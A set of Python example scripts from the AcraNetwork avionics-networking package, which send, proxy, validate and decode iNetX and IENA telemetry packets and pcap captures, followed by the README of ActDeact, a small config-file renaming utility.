# Create an inetx packet
myiena = iena.IENA()
myiena.key = 0xDC
myiena.keystatus = 0x0
myiena.status = 0x0
myiena.timeusec = useconds_since_jan1st
myiena.payload = struct.pack(">700H", *(range(700)))
myiena.sequence = 0
# Figure how much of a gap between packets
_payload_len = len(myiena.pack())
total_vol_data = 0
chunk_count_ps = args.rate * 1e6/(_payload_len * 8)
tx_time_vol = total_vol_data * 8 * 1e-9
gap_per_pkt = (1 - tx_time_vol) / (chunk_count_ps)
if gap_per_pkt <= 0:
gap_per_pkt = 0
print("UDP target IP:", args.ipaddress)
print("UDP target port:", dst_udp_port)
print("Rate = {} Mbps".format(args.rate))
print("DLY = {:.6f} s".format(gap_per_pkt))
# keep a track of the packets sent
sequence_roll_over = pow(2, 16)
packet_count = 1
vol_data_sent = 0
# Handle the user interruption gracefully
def signal_handler(*args):
print(f"Exiting. Sent {packet_count:>12,} packets and {vol_data_sent:>15,} bytes")
sys.exit()
signal.signal(signal.SIGINT, signal_handler)
# loop forever
while True:
mypayload = myiena.pack()
sock.sendto(mypayload, (args.ipaddress, dst_udp_port))
vol_data_sent += (len(mypayload) + hdr_lens)
# Increment the sequence number
myiena.sequence = (myiena.sequence + 1) % sequence_roll_over
# Add to the timeuseconds
myiena.timeusec += int(gap_per_pkt * 1e6)
# Sleep
accurate_sleep(gap_per_pkt)
# Information
packet_count += 1
if packet_count % 100 == 0:
print(f"{packet_count:>12,} packets sent. {vol_data_sent:>18,} bytes send.")
if __name__ == '__main__':
parser = create_parser()
pargs = parser.parse_args()
main(pargs)
sys.exit(0) | AcraNetwork | /AcraNetwork-0.16.1.tar.gz/AcraNetwork-0.16.1/examples/tx_iena_udp.py | tx_iena_udp.py |
__author__ = "Diarmuid Collins"
__copyright__ = "Copyright 2018"
__version__ = "0.1.0"
__maintainer__ = "Diarmuid Collins"
__email__ = "[email protected]"
__status__ = "Production"
import sys
sys.path.append("..")
import socket
import argparse
import AcraNetwork.iNetX as inetx
import AcraNetwork.IENA as iena
import AcraNetwork.McastSocket as McastSocket
VERSION = __version__
parser = argparse.ArgumentParser(description='Proxy iNetX or IENA packets to UDP')
parser.add_argument('--ipaddress', type=str, default="235.0.0.1", required=True, help='The multicast IP address on which the iNetX or IENA packets are being transmitted')
parser.add_argument('--inetx', type=int, default=None, required=False, help='Receiving iNetX packets on this UDP port. Either this argument of --iena should be supplpied')
parser.add_argument('--iena', type=int, default=None, required=False, help='Receiving IENA packets on this UDP port')
parser.add_argument('--udp', type=int, default=None, required=True, help='Transmit UDP packets on this UDP port')
parser.add_argument('--version', action='version', version='%(prog)s {}'.format(VERSION))
args = parser.parse_args()
if not (args.inetx or args.iena):
print(parser.print_help())
sys.exit(1)
# The incoming iNetx port
if args.inetx:
incoming_udp_port = args.inetx
else:
incoming_udp_port = args.iena
# Outgoing UDP port
outgoing_udp_port = args.udp
#------------------------------------------------------------
# Setup a socket to recieve all traffic
#------------------------------------------------------------
try:
recv_socket = McastSocket.McastSocket(local_port=incoming_udp_port, reuse=1)
recv_socket.mcast_add(args.ipaddress, '0.0.0.0')
recv_socket.settimeout(10)
except:
print("Can't bind to socket {} on multicast {}".format(incoming_udp_port, args.ipaddress))
exit()
tx_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
packet_count = 1
while True:
# Capture some data
try:
data, addr = recv_socket.recvfrom(2048) # buffer size is 1500 bytes
except socket.timeout:
print("ERROR: No incoming packets received on UDP port {} on multicast {}. Timeout on socket".format(
incoming_udp_port, args.ipaddress))
exit()
(udpsrcport,srcipaddr) = addr
# Decode it as iNetx
if args.inetx:
avionics_packet = inetx.iNetX()
else:
avionics_packet = iena.IENA()
try:
avionics_packet.unpack(data)
except ValueError:
# This isn't an inetx packet
continue
else:
packet_count += 1
# Transmit the _payload back out
tx_socket.sendto(avionics_packet.payload, (args.ipaddress, outgoing_udp_port))
# Print some info for the user
if packet_count % 50 == 0:
print(".")
else:
print(".",) | AcraNetwork | /AcraNetwork-0.16.1.tar.gz/AcraNetwork-0.16.1/examples/proxy_to_udp.py | proxy_to_udp.py |
# Very rudimentary (but fast) validation of recorded data
# Finds all inetx packets and validate no missing sequence numbers
# It will also take the url to an axn mem and verify data after downloading
import sys
sys.path.append("..")
sys.path.append(".")
import AcraNetwork.Pcap as pcap
import glob
import os.path
import struct
import time
import logging
import argparse
import json
from urllib.parse import urlparse
from urllib.request import urlopen
from os import mkdir, remove
import datetime
from dataclasses import dataclass, field
import typing
VERSION = "0.4.0"
logging.basicConfig(
level=logging.INFO, format="%(levelname)-6s %(asctime)-15s %(message)s"
)
@dataclass
class Streams:
streamid: int
sequence: int
pkt_count: int
start_ts: float
end_ts: float
dropcnt: int
rstcnt: int
length: int
datavol: int
sequence_list: typing.List[int] = field(default_factory=list)
def pps(self) -> int:
if self.end_ts - self.start_ts <= 0:
return 0
return int(self.pkt_count / (self.end_ts - self.start_ts))
def bitrate(self) -> int:
if self.end_ts - self.start_ts <= 0:
return 0
return int(self.length * 8 * self.pkt_count / (self.end_ts - self.start_ts))
def timelen(self) ->float:
return self.end_ts - self.start_ts
def drops_to_hist(self):
bins = 30
start_seq = self.sequence - self.pkt_count - self.dropcnt
bin_wdth = int((self.sequence - start_seq) / bins)
bin_cnt = [0] * bins
for i in range(bins):
for s in self.sequence_list:
#print(f"{i}:{start_seq}:{s}:{bin_wdth}")
if (start_seq + bin_wdth * i) <= s < (start_seq + bin_wdth * (i + 1)):
bin_cnt[i] += 1
rstring = "|"
for cnt in bin_cnt:
if cnt == 0:
rstring += " "
else:
if cnt > 9:
cnt = "*"
rstring += f"{cnt}"
rstring += "|"
return rstring
def create_parser():
# Argument parser
parser = argparse.ArgumentParser(
description="Validate inetx sequence numbers quickly in a pcap file"
)
# Common
parser.add_argument(
"--folder",
type=str,
required=True,
default=None,
help="folder to parser for pcap files. Can be a URL",
)
parser.add_argument(
"--verbose",
required=False,
action="store_true",
default=False,
help="verbose mode",
)
parser.add_argument(
"--summary",
required=False,
action="store_true",
default=False,
help="only print summaries per file",
)
parser.add_argument(
"--control",
type=int,
required=False,
default=0x11000000,
help="control field value",
)
parser.add_argument(
"--histogram",
required=False,
action="store_true",
default=False,
help="print a rough histogram of where the drops happened",
)
parser.add_argument(
"--version", action="version", version="%(prog)s {}".format(VERSION)
)
return parser
# recorder data
# tcpdump -i eth0 -W 999 -C 1000 -n -K -s 2000 -w rec.pcap.
def uri_validator(x):
try:
result = urlparse(x)
return all([result.scheme, result.netloc])
except:
return False
def main(args):
roll_over = pow(2, 32)
fnames = {}
if uri_validator(args.folder):
is_url = True
all_files = []
with urlopen(args.folder) as response:
response_content = response.read()
json_resp = json.loads(response_content)
for f, e in json_resp.items():
all_files.append(e["url"])
fnames[e["url"]] = f
else:
is_url = False
# Find all the files and sort by extension
all_files = glob.glob(os.path.join(args.folder, "*.pcap*"))
all_files.sort()
# For recording the data
streams: typing.Dict[int, Streams] = {}
inetx_pkts_validate = 0
data_count_bytes = 0
start_t = time.time()
loss_count = 0
loss_data = 0
total_pkt_count = 0
for pfile in all_files:
# To calculate the rate per pcap
first_pcap_time = None
last_pcap_time = None
packet_data_vol = 0
tmp_folder = "httpdl"
loss = 0
floss = 0
outf = ""
if is_url:
CHUNK = 32 * 1024
if not os.path.exists(tmp_folder):
mkdir(tmp_folder, 0o755)
outf = os.path.join(tmp_folder, fnames[pfile])
sd = time.time()
with urlopen(pfile) as response, open(outf, "wb") as out_file:
data_len = 0
while True:
chunk = response.read(CHUNK)
if not chunk:
break
data_len += len(chunk)
out_file.write(chunk)
dlspeed = data_len * 8 / (time.time() - sd) / 1e6
logging.info(
"Downloaded {} at {:.1f}Mbps and wrote to {}".format(
pfile, dlspeed, outf
)
)
p = pcap.Pcap(outf)
else:
p = pcap.Pcap(pfile)
prev_rec_ts = None
for i, r in enumerate(p):
if first_pcap_time is None:
first_pcap_time = r.sec + r.usec * 1e-6
last_pcap_time = r.sec + r.usec * 1e-6
# Do a check on the record timestamp
if prev_rec_ts is not None:
if prev_rec_ts > last_pcap_time:
delta = prev_rec_ts - last_pcap_time
logging.warning(
f"Record={i + 1} Record timestamp negative jump {delta}s")
prev_rec_ts = last_pcap_time
packet_data_vol += len(r.payload)
total_pkt_count += 1
if len(r.payload) >= (
26 + 0x28
): # For short packets don't try to decode them as inetx
# pull out the key fields
(
dst_port,
udp_len,
checksum,
control,
stream_id,
seq,
_len,
ptpsec,
ptpnsec
) = struct.unpack_from(">HHHIIIIII", r.payload, 0x24)
if control == args.control:
if stream_id in streams:
stream = streams[stream_id]
if seq != (stream.sequence + 1) % roll_over:
pkt_ts = datetime.datetime.fromtimestamp(
r.sec + r.usec * 1e-6
).strftime("%H:%M:%S.%f %d %b")
if seq < stream.sequence:
logging.warning(
"Source Restarted. File={} PktNum={} StreamID={:#0X} PrevSeq={} "
"CurSeq={}".format(
pfile,
i,
stream_id,
stream.sequence,
seq,
)
)
stream.rstcnt += 1
else:
loss = seq - ((stream.sequence + 1) % roll_over)
if not args.summary:
logging.error(
"File={} TS={} PktNum={} StreamID={:#0X} PrevSeq={} CurSeq={} Lost={} Lost={:,} bytes".format(
pfile,
pkt_ts,
i,
stream_id,
stream.sequence,
seq,
loss,
loss * stream.length
)
)
loss_count += loss
loss_data += (loss * stream.length)
stream.dropcnt += loss
stream.sequence_list.append(stream.sequence + 1)
floss += loss
stream.sequence = seq
stream.pkt_count += 1
stream.end_ts = ptpsec + ptpnsec/1e9
stream.datavol += len(r.payload)
else:
stream = Streams(stream_id, seq, 1, ptpsec + ptpnsec/1e9,
ptpsec + ptpnsec/1e6, 0, 0, len(r.payload),
len(r.payload), [])
streams[stream_id] = stream
inetx_pkts_validate += 1
data_count_bytes += len(r.payload)
p.close()
# The data rate at which we are validating
try:
dr = (data_count_bytes * 8) / (1e6 * (time.time() - start_t))
except:
dr = 100
try:
ave_rec_rate_mbps = (
(packet_data_vol * 8) / (last_pcap_time - first_pcap_time) / 1e6
)
except:
ave_rec_rate_mbps = 0
sids_found = len(streams)
if first_pcap_time is not None:
file_stamp = datetime.datetime.fromtimestamp(first_pcap_time).strftime(
"%H:%M:%S %d %b"
)
else:
file_stamp = "unknown"
info_str = (
f"In {os.path.basename(pfile)} starting at {file_stamp}, {inetx_pkts_validate:10} packets validated. "
f"Total_data={data_count_bytes/1e6:8.0f}KB Lost={floss:5} StreamsFound={sids_found:5} "
f"RecordRate={ave_rec_rate_mbps:5.0f}Mbps ValRate={dr:5.0f}Mbps"
)
if loss > 0:
logging.error(info_str)
else:
logging.info(info_str)
if args.verbose:
if len(streams) > 0:
logging.info(
"{:>7s} {:>9s} {:>9s} {:>9s} {:>9s}".format(
"SID", "Seq", "LostCount", "ResetCnt", "Length"
)
)
for sid, stream in streams.items():
logging.info(
"{:#07X} {:9d} {:9d} {:9d} {:9d}".format(
sid,
stream.sequence,
stream.dropcnt,
stream.rstcnt,
stream.length,
)
)
if is_url and loss == 0:
remove(outf)
elif is_url and not args.verbose:
remove(outf)
print("\n")
if len(streams) > 0:
logging.info(
"{:>7s} {:>15s} {:>9s} {:>9s} {:>9s} {:>9s} {:>9s} {:>18s} {:>12s} {:>12s} {:>12s}".format(
"SID", "Cnt", "LostCount", "ResetCnt", "Length", "PPS", "Mbps", "Elapsed Time(s)",
"DataVol(MB)", "DropVol(Bytes)", "BitRate(Mbps)"
)
)
for sid, stream in sorted(streams.items()):
if args.histogram:
_hist = stream.drops_to_hist()
else:
_hist = ""
logging.info(
"{:#07X} {:15,d} {:9d} {:9d} {:9d} {:9d} {:9.1f} {:18.1f} {:12,.1f} {:12,d} {:12,.1f} {}".format(
sid, stream.pkt_count, stream.dropcnt, stream.rstcnt, stream.length,
stream.pps(), stream.bitrate()/1e6, stream.timelen(), stream.datavol/1e6,
stream.dropcnt * stream.length, stream.datavol * 8 / (stream.timelen() * 1e6), _hist
)
)
print(
f"\nSUMMARY: RXPKTS={total_pkt_count:>15,} RXINETX={inetx_pkts_validate:>15,} "
f"RXBYTES={data_count_bytes//1024:>15,.1f} KB LOSTPKTS={loss_count:>15,} LOSTDATA={loss_data//1024:>15,.1f} KB"
)
if __name__ == "__main__":
parser = create_parser()
args = parser.parse_args()
main(args)
sys.exit(0) | AcraNetwork | /AcraNetwork-0.16.1.tar.gz/AcraNetwork-0.16.1/examples/validate_pcap.py | validate_pcap.py |
__author__ = "Diarmuid Collins"
__copyright__ = "Copyright 2018"
__version__ = "0.0.1"
__maintainer__ = "Diarmuid Collins"
__email__ = "[email protected]"
__status__ = "Production"
import sys
sys.path.append("..")
import os,struct
import argparse
import AcraNetwork.iNetX as inetx
import AcraNetwork.Pcap as pcap
import AcraNetwork.SimpleEthernet as SimpleEthernet
def main():
#----------------------------------
# Setup the command line parser
#----------------------------------
parser = argparse.ArgumentParser(description='Dump out the _payload of iNetX packets as ASCII representations')
parser.add_argument('--pcap', required=True, action='append', help='The input pcap file(s)')
parser.add_argument('--hex', required=False, action='store_true', default=False, help='Print the hex representation not the ASCII coded version')
parser.add_argument('--outdir', required=False, default="out", help='Name of output directory. Default is out')
args = parser.parse_args()
#------------------------------------------------------------
# Now read the input.
#------------------------------------------------------------
# The input will take multiple pcap files and loop through each
# Keep a track of the position in the line for each streamID
output_byte_count ={}
for pcapfilename in args.pcap:
try:
pcapfile = pcap.Pcap(pcapfilename)
except IOError:
print("ERROR: File {} not found".format(pcapfilename))
exit()
if not os.path.exists(args.outdir):
os.mkdir(args.outdir)
for pcaprecord in pcapfile:
eth = SimpleEthernet.Ethernet()
eth.unpack(pcaprecord.packet)
ip = SimpleEthernet.IP()
ip.unpack(eth.payload)
udp_packet = SimpleEthernet.UDP()
udp_packet.unpack(ip.payload)
(ctrl_word,) = struct.unpack('>I',udp_packet.payload[:4])
if ctrl_word == 0x11000000:
inetx_packet = inetx.iNetX()
# Unpack the udp _payload as an iNetx packet
inetx_packet.unpack(udp_packet.payload)
# Do we want to dump out an ascii or hex output
if args.hex == True:
prefix = "hex"
else:
prefix = "ascii"
# Create an output file per streamID and open it
output_file_name = "{}/{}_{:08X}.txt".format(args.outdir,prefix,inetx_packet.streamid)
# NB: We are appending to the file here so if you have existing files in the directory then it will be appended
output_file = open(output_file_name,'a')
# Start the byte count per streamID
if inetx_packet.streamid not in output_byte_count:
output_byte_count[inetx_packet.streamid] = 1
# Go thorough each byte in the _payload. Not particularly efficient
for offset in range(len(inetx_packet.payload)):
# Unpack the _payload as an unsigned integer
(byte_in_ascii,) =struct.unpack_from('B', inetx_packet.payload, offset)
# Write the output depending on what you want
if args.hex == True:
output_file.write("{:02X} ".format(byte_in_ascii))
else:
# Only some ASCII codes are printable so don't print out
# the non printable ones. Emulate the wireshark method of printing a period
if byte_in_ascii < 31 or byte_in_ascii > 126:
printable_string = "."
else:
printable_string = chr(byte_in_ascii)
output_file.write("{}".format(printable_string))
# Create a new line after 16 bytes for readability
if (output_byte_count[inetx_packet.streamid] % 16 == 0):
output_file.write('\n')
output_byte_count[inetx_packet.streamid] += 1
print("Output files created in {} directory".format(args.outdir))
if __name__ == '__main__':
main() | AcraNetwork | /AcraNetwork-0.16.1.tar.gz/AcraNetwork-0.16.1/examples/pcap_to_ascii.py | pcap_to_ascii.py |
__author__ = "Diarmuid Collins"
__copyright__ = "Copyright 2018"
__version__ = "0.0.1"
__maintainer__ = "Diarmuid Collins"
__email__ = "[email protected]"
__status__ = "Production"
import sys
sys.path.append("..")
import AcraNetwork.Pcap as pcap
import AcraNetwork.iNetX as inetx
import AcraNetwork.MPEGTS as mpegts
import AcraNetwork.SimpleEthernet as eth
from AcraNetwork.MPEGTS import H264
import datetime
# This script shows how to parse either a pcap file or a TS file into the constituent
# NALS and finds the unique STANAG SEI User data with the timestamp
def pcap_to_ts(pcapfile,ts_file,udp_port=8010):
'''
Convert a pcap file to a TS file by extracting all data from a specified port
:param mpegfile: str
:param ts_file: str
:param udp_port: int
:return:
'''
mpegpcap = pcap.Pcap(pcapfile, mode='r')
ts = open(ts_file, mode='wb')
mpeghex = ""
rec_count = 0
for rec in mpegpcap:
try:
e = eth.Ethernet()
e.unpack(rec.packet)
i = eth.IP()
i.unpack(e.payload)
u = eth.UDP()
u.unpack(i.payload)
if u.dstport == udp_port:
rec_count += 1
inet = inetx.iNetX()
inet.unpack(u.payload)
mpegtspackets = mpegts.MPEGTS()
mpegtspackets.unpack(inet.payload)
for packet in mpegtspackets.blocks:
mpeghex += packet.payload
ts.write(inet.payload)
except:
continue
def parse_ts_file(tsfile):
ts_file = open(tsfile,mode='rb')
h264_data = H264()
h264_data.unpack(ts_file.read())
nal_counts = {}
timestamp_count = 0
for nal in h264_data.nals:
if not nal.type in nal_counts:
nal_counts[nal.type] = 1
else:
nal_counts[nal.type] += 1
if nal.type == mpegts.NAL_TYPES["SEI"]:
if nal.sei.unregdata:
print("Timestamp={} byte offset={} count ={}".format(datetime.datetime.strftime(nal.sei.time,"%d %b %Y %H:%M:%S.%f"),nal.offset,timestamp_count))
timestamp_count += 1
else:
pass
print("\n----- SUMMARY -----")
for type in nal_counts:
print("{} {} NALs in input".format(nal_counts[type],mpegts.NAL_TYPES_INV[type]))
print("{} STANAG Timestamps".format(timestamp_count))
def main():
# Read in a TS file and print out some useful information
parse_ts_file("../test/stanag_sample.ts")
if __name__ == "__main__":
main() | AcraNetwork | /AcraNetwork-0.16.1.tar.gz/AcraNetwork-0.16.1/examples/parse_mpeg_pcap.py | parse_mpeg_pcap.py |
# -*- coding: utf-8 -*-
"""
=====
Sending UDP packets
=====
Send UDP packets at a specific rate
This can be customised by providing an ini file. Format:
[inetxpayloadlength]
min=1300
max=1400
[randomisation]
#distribution=uniform
distribution=beta
alpha=3
beta=1
[tweaks]
packetbuildtime=0.0000070
"""
__author__ = "Diarmuid Collins"
__copyright__ = "Copyright 2018"
__version__ = "0.4.0"
__maintainer__ = "Diarmuid Collins"
__email__ = "[email protected]"
__status__ = "Production"
import sys
sys.path.append("..")
import time
import struct
import AcraNetwork.iNetX as inetx
import AcraNetwork.SimpleEthernet as eth
import argparse
import socket
import random
import signal
import configparser
from collections import namedtuple
from dataclasses import dataclass
ConfigSetting = namedtuple("ConfigSetting", ['min', 'max', 'dist', 'alpha', 'beta', 'buildtime', 'accuratets'])
NANOSECS = int(1e9)
@dataclass
class TS:
sec: int
nsec: int
def add(self, gap):
ns = int(gap * 1e9)
_dlt = self.nsec + ns
self.nsec = (_dlt % NANOSECS)
self.sec += int(_dlt/NANOSECS)
def pack(self):
return struct.pack(">II", self.sec, self.nsec)
def get_default_settings(configfile: str) -> ConfigSetting:
config = configparser.ConfigParser()
config.read(configfile)
min = int(config.get('inetxpayloadlength', 'min', fallback='64'))
max = int(config.get('inetxpayloadlength', 'max', fallback='1400'))
dist = (config.get('randomisation', 'distribution', fallback='uniform'))
alpha = float(config.get('randomisation', 'alpha', fallback='3.0'))
beta = float(config.get('randomisation', 'beta', fallback='1.0'))
buildtime = float(config.get('tweaks', 'packetbuildtime', fallback='0.0000070'))
accuratets = int(config.get('tweaks', 'accuratetimestamp', fallback='0'))
print(f"Payload Length= {min} to {max}, Distribution={dist} (alpha={alpha} beta={beta}) Tweak={buildtime}")
return ConfigSetting(min, max, dist, alpha, beta, buildtime, accuratets)
def create_parser():
# Argument parser
parser = argparse.ArgumentParser(description='Send iNetX packets at a specified rate')
parser.add_argument('--rate', required=False, type=float, default=1.0, help="Packet rate in Mbps")
parser.add_argument('--ipaddress', required=False, type=str, default="192.168.0.26", help="Destination IP")
parser.add_argument('--config', required=False, type=str, default="", help="Destination IP")
parser.add_argument('--maxpps', required=False, type=int, default=None, help="Specify a max pps value")
parser.add_argument('--datavol', required=False, type=int, default=None, help="Stop after specified bytes")
parser.add_argument('--sidcount', required=False, type=int, default=1, help="number of stream ids to send")
return parser
def accurate_sleep(duration, get_now=time.perf_counter):
now = get_now()
end = now + duration
while now < end:
now = get_now()
def main(args):
dst_udp_port = 4444
cfg = get_default_settings(args.config)
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
# Create an inetx packet
myinetx = inetx.iNetX()
payload_pkts = {}
bsid = random.randint(0x0, 0xFF) << 8
FCS_LEN = 4
PREAMBLE = 8
hdr_lens = eth.UDP.UDP_HEADER_SIZE + eth.IP.IP_HEADER_SIZE + eth.Ethernet.HEADERLEN + FCS_LEN + PREAMBLE
tx_pkt_overhead = cfg.buildtime
total_vol_data = 0
timestamp = TS(int(time.time()), 0)
for idx in range(args.sidcount):
myinetx.inetxcontrol = inetx.iNetX.DEF_CONTROL_WORD
myinetx.pif = 0
myinetx.streamid = bsid + idx
myinetx.sequence = 0
if cfg.dist == "beta":
myinetx.payload = struct.pack(">B", idx+1) * int((cfg.max - cfg.min) * random.betavariate(cfg.alpha, cfg.beta) + cfg.min)
else:
myinetx.payload = struct.pack(">B", idx+1) * random.randint(cfg.min, cfg.max)
myinetx.setPacketTime(timestamp.sec)
packet_payload = myinetx.pack()
print("iNetX StreamID={:#0X} Length incl headers={}".format(myinetx.streamid, len(packet_payload) + hdr_lens))
payload_pkts[myinetx.streamid] = {
'payload': packet_payload, 'length': len(packet_payload) + eth.UDP.UDP_HEADER_SIZE + eth.IP.IP_HEADER_SIZE
+ eth.Ethernet.HEADERLEN}
pkt_len = len(packet_payload) + 8 + 20 + 14
total_vol_data += (pkt_len + hdr_lens)
chunk_count_ps = args.rate * 1e6/(total_vol_data * 8)
tx_time_vol = total_vol_data * 8 * 1e-9
gap_per_pkt = (1 - tx_time_vol) / (args.sidcount * chunk_count_ps) - tx_pkt_overhead
if gap_per_pkt <= 0:
gap_per_pkt = 0
if args.datavol is None:
expected_end_time = "unknown"
else:
expected_end_time = int(args.datavol * 8 / args.rate /60)
pps = int(args.sidcount * chunk_count_ps)
if args.maxpps is not None:
if pps > args.maxpps:
raise Exception(f"The specified combination has generated a pps of {pps}, creater than {args.maxpps}")
print("UDP target IP:", args.ipaddress)
print("UDP target port:", dst_udp_port)
print("Rate = {} Mbps".format(args.rate))
print("DLY = {:.6f} s".format(gap_per_pkt))
print("PPS = {} s".format(pps))
sequence_roll_over = pow(2, 64)
pkt_count = {}
for sid in payload_pkts.keys():
pkt_count[sid] = 0
packet_count = 1
vol_data_sent = 0
def signal_handler(*args):
print(f"Exiting. Sent {packet_count:>12,} packets and {vol_data_sent:>15,} bytes")
sys.exit()
signal.signal(signal.SIGINT, signal_handler)
run_sec = 0
while True:
random_sid = bsid + (packet_count % args.sidcount)
random_payload = payload_pkts[random_sid]["payload"]
if cfg.accuratets:
mypayload = random_payload[:8] + struct.pack(">I", pkt_count[random_sid]) + \
random_payload[12:16] + timestamp.pack() + random_payload[24:]
timestamp.add(gap_per_pkt)
else:
mypayload = random_payload[:8] + struct.pack(">I", pkt_count[random_sid]) + \
random_payload[12:]
# Faster way to build an inetx packet instead of packing the whole header
pkt_count[random_sid] = (pkt_count[random_sid] + 1) % sequence_roll_over
sock.sendto(mypayload, (args.ipaddress, dst_udp_port))
vol_data_sent += (len(mypayload) + hdr_lens)
accurate_sleep(gap_per_pkt)
packet_count += 1
if packet_count % (pps * 30) == 0:
run_sec += 30
if args.datavol is not None:
expected_end_time = int((args.datavol - vol_data_sent) * 8 /(args.rate * 1e6) / 60)
if vol_data_sent > args.datavol:
signal_handler()
print(f"After {run_sec:>8} seconds : {packet_count:>12,} packets sent. {vol_data_sent:>18,} bytes send."
f"End in {expected_end_time} minutes")
if __name__ == '__main__':
parser = create_parser()
pargs = parser.parse_args()
main(pargs)
sys.exit(0) | AcraNetwork | /AcraNetwork-0.16.1.tar.gz/AcraNetwork-0.16.1/examples/tx_inetx_udp.py | tx_inetx_udp.py |
import socket,os,struct,sys
import argparse
import datetime, time
import AcraNetwork.iNetX as inetx
import AcraNetwork.Pcap as pcap
from AcraNetwork.SimpleEthernet import mactoreadable
import AcraNetwork.ParserAligned as ParserAligned
def main():
#----------------------------------
# Setup the command line parser
#----------------------------------
parser = argparse.ArgumentParser(description='Analyse a pcap file looking for iNetX parser aligned packets')
parser.add_argument('--pcap', required=True, action='append', help='The dump pcap packet')
args = parser.parse_args()
#------------------------------------------------------------
# Now read the input.
#------------------------------------------------------------
# The input will take multiple pcap files and loop through each
for pcapfilename in args.pcap:
try:
pcapfile = pcap.Pcap(pcapfilename)
except IOError:
print("ERROR: File {} not found".format(pcapfilename))
exit()
packet_count = 1
start_of_run = time.time() # benchmarking
while True:
try:
# So we loop through the file one packet at a time. This will eventually return an
# exception at the end of file so handle that when it occurs
(eth_packet,ip_packet,udp_packet) = pcapfile._readNextUDPPacket()
if udp_packet.isinetx: # This is a rough guess assuming the control word is 0x11000000
inetx_packet = inetx.iNetX()
inetx_packet.unpack(udp_packet.payload)
readablemac = mactoreadable(eth_packet.srcmac) # handy function to return the mac address in a readable format
output_format = "SRCMAC={:>20s} SRCIP={:>15s} DSTPORT={:5d} StreamID={:#5x} Sequence={:10d}"
# What string do we want outputted to the screen. The output format is defined in the coloredop class
outstring =output_format.format(readablemac ,ip_packet.srcip, udp_packet.dstport,inetx_packet.streamid,inetx_packet.sequence)
# Print out one line and the dropped packet info
print(outstring)
# We have a parser aligned block
if inetx_packet.streamid == 0x11121314: # This specific streamid is a parser aligned block
parser_aligned_packet = ParserAligned.ParserAlignedPacket()
# unpack the _payload as the parser data
parser_aligned_packet.unpack(inetx_packet.payload)
# Loop through all the blocks in the packet and spit them out
for pblock in parser_aligned_packet.parserblocks:
(payload_data,) =struct.unpack('>I',pblock.payload)
print("Quadb={:5} Msgcnt={:5} BusId={:4} Elapsed={:20}".format(pblock.quadbytes,pblock.messagecount,pblock.busid,pblock.elapsedtime,payload_data))
packet_count += 1
except NotImplementedError:
# We received a packet that we don't care about. So skip silently
packet_count += 1
pass
except IOError:
# We are at the end of the file so lets jump to the next file
print(( "End of file reached. Packets Per Second ={:5.1f}".format(packet_count/(time.time()-start_of_run))))
break
if __name__ == '__main__':
main() | AcraNetwork | /AcraNetwork-0.16.1.tar.gz/AcraNetwork-0.16.1/examples/deprecated/parser_aligned_pcap_example.py | parser_aligned_pcap_example.py |
import socket,os,struct,sys
import argparse
import datetime, time
import AcraNetwork.iNetX as inetx
import AcraNetwork.Pcap as pcap
import AcraNetwork.SimpleEthernet as SimpleEthernet
import AcraNetwork.ParserAligned as ParserAligned
def main():
try:
pcapfile = pcap.Pcap("SSR_ABM_102_capture_example1.pcap")
except IOError:
print("ERROR: Could not find input file SSR_ABM_102_capture_example1.pcap")
exit()
# Keep a running count of the packets
packet_count = 1
# Keep a count of previous sequence number to detect a dropped packets
PreviousSeqNum = dict()
while True: # while we are not at the end of the file
try:
# So we loop through the file one packet at a time. This will eventually return an
# exception at the end of file so handle that when it occurs
pcaprecord = pcapfile.readAPacket()
eth = SimpleEthernet.Ethernet()
eth.unpack(pcaprecord.packet)
ip = SimpleEthernet.IP()
ip.unpack(eth.payload)
udp_packet = SimpleEthernet.UDP()
udp_packet.unpack(ip.payload)
(ctrl_word,) = struct.unpack('>I',udp_packet.payload[:4])
if ctrl_word == 0x11000000: # This is a rough guess assuming the control word is 0x11000000
inetx_packet = inetx.iNetX()
inetx_packet.unpack(udp_packet.payload)
#----------------------------
# Check for dropped packet
#----------------------------
if inetx_packet.streamid not in PreviousSeqNum:
PreviousSeqNum[inetx_packet.streamid] = inetx_packet.sequence
else:
if PreviousSeqNum[inetx_packet.streamid]+1 != inetx_packet.sequence:
print("ERROR: Dropped {} packets on streamid={:#x} at packet count={}".format(inetx_packet.sequence - PreviousSeqNum[inetx_packet.streamid] + 1,inetx_packet.streamid,packet_count))
PreviousSeqNum[inetx_packet.streamid] = inetx_packet.sequence
print("----- StreamID={:#10x} SourceIP= {:10s} -----".format(inetx_packet.streamid,ip_packet.srcip))
#--------------------------------------------------------------------------------
# Packets on stream id 0x11121314 is a parser aligned block so lets look at this
#--------------------------------------------------------------------------------
if inetx_packet.streamid == 0x11121314:
parser_aligned_packet = ParserAligned.ParserAlignedPacket()
# unpack the _payload as the parser data
parser_aligned_packet.unpack(inetx_packet.payload)
# Loop through all the blocks in the packet and spit them out
for pblock in parser_aligned_packet.parserblocks:
(payload_data,) =struct.unpack('>I',pblock.payload)
print("Sequence Number = {:8} Quadbyes={:5} Msgcnt={:5} BusId={:4} Elapsed={:20} ".format(inetx_packet.sequence, pblock.quadbytes,pblock.messagecount,pblock.busid,pblock.elapsedtime,payload_data))
packet_count += 1
except NotImplementedError:
# We received a packet that we don't care about. So skip silently
packet_count += 1
pass
except IOError:
# We are at the end of the file so lets jump to the next file
print ( "End of file reached")
exit()
if __name__ == '__main__':
main() | AcraNetwork | /AcraNetwork-0.16.1.tar.gz/AcraNetwork-0.16.1/examples/deprecated/simple_parser_packets_from_pcap.py | simple_parser_packets_from_pcap.py |
# A very simple [De]Activator for config files
This tool renames files by adding and removing a predefined prefix and suffix. It's intented use is to quickly activate and deactivate config files.
## Installation
```
$ pip install ActDeact
```
## Usage
```
Usage: actDeact [options] args
Options:
--version show program's version number and exit
-h, --help show this help message and exit
-a, --activate Activate file(s)
-d, --deactivate Deactivate file(s)
-v, --verbose Verbose output
-c, --config Show the filename of the config file for editing
```
Also two helper programs `act` and `deact` are provided. They are aliases to `actDeact -d` and `actDeact -a` and pass every argument directly to those programs.
### Example
`actDeact -d foo` renames `foo` to `foo_bak` by default. This is equivaltent to `deact foo` .
`actDeact -a foo` renames `foo_bak` to `foo` by default. This is equivaltent to `act foo` .
## Configuration
`actDeact -c` shows the filename of the configuration file. Its default content is:
```
[Main]
Prefix=
Suffix=_bak
```
In this file a prefix and a suffix can be set.
| ActDeact | /ActDeact-1.0.0.tar.gz/ActDeact-1.0.0/README.md | README.md |
# Licensed under the Apache License, Version 2.0 (the "License");
